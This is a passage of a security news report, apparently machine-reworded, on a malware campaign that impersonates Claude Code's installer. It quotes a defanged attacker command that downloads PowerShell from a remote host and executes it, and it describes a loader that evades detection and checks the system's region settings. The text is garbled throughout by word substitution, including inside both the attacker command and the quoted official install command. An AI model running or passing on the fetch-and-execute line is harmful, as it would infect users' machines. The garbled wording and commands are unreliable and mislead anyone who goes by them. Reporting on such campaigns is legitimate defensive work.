“Builders maintain the keys to a corporation’s most delicate property – mental property, cloud infrastructure, CI/CD pipelines,” stated Vineeta Sangaraju, AI Analysis Engineer at Black Duck. “Additionally they, by necessity, want the liberty to obtain and set up software program. That mixture makes them a high-value goal.”
Ontinue researchers stated that all the things presumably detectable on the assault chain is wrapped throughout the PowerShell loader, complicating detection. “Two normal API-chain rule units we evaluated in opposition to the binary returned no matches,” they stated in a weblog submit.
The malware has “geographic exclusion” enabled, which has it scan the host’s Home windows areas settings in opposition to an inventory of to-exclude geographies, specifically all of the CIS member states and Iran, and instantly abort execution if there’s a match.
Marketing campaign replaces Claude Code’s official one-line setup
Based on Ontinue, the marketing campaign will depend on faux installer pages impersonating Claude Code distribution channels. Nonetheless, quite than delivering Anthropic’s official one-line set up routine, “irm https[:]//claude[.]ai/set up.ps1 | iex,” the pages serve attacker-controlled PowerShell instructions (“irm occasions[.]msft23[.]com | iex”) that provoke a staged payload chain.
